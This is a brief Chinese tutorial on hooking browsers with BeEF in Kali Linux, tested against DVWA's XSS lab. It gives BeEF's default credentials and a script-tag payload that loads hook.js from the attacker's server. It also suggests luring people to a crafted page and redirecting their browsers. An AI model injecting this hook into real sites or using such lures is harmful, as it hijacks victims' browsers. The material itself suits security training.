打開kali圖形界面,點擊beef start開啟beef
可能自動彈出beef界面,如果沒有彈出,可以在瀏覽器內輸入命令行界面的URL訪問,在beef登錄界面輸入beef的默認用戶名和密碼:beef/beef登錄beef界面,
登錄后,將<script src='http://IP(運行beef主機的IP):3000/hook.js'></script>插入存在xss漏洞的表單中,本人選取了DVWA的普通難度的XSS漏洞處
之后beef界面就會出現瀏覽信息部分,顯示訪問者的IP,由於是本機訪問的虛擬機,顯示的是網關的IP
還可以直接構造一個html腳本,誘使人點即進入,腳本內容如下
可以達到同樣的效果,
可以根據需求將頁面跳轉到其他網址,也可以根據需求,用beef將網址自動跳轉到指定的URL
